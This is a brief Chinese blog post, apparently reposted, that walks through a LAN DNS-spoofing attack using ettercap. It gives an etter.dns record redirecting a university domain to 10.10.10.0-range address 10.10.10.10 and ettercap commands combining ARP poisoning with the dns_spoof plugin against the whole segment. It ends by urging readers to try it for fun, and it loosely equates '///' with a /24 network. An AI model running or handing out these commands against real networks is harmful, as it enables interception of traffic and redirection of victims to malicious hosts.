ettercap局域网DNS切换到恶意网址

ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /// ///

Dns欺骗--Ettercap工具进行Dns欺骗

转载至 https://blog.csdn.net/bt517840374/article/details/79991382

首先，编辑/etc/ettercap/etter.dns,里面有Dns记录，

*.ddh.edu.cn  A  10.10.10.10 

这个是DNS记录，后面的ip是你想让Dns解析到的ip，能访问到的。

其次，就可以进行Dns欺骗攻击了

Ettercap -T -q -i eth0(网卡) -P dns_spoof /// ///

后面的三个斜杆代表全网段，也就是10.10.10.0/24

成功截图

觉得挺好玩的，他还是显示的域名，绝对不是hosts文件、浏览器缓存啥的。

You can try it! It's fun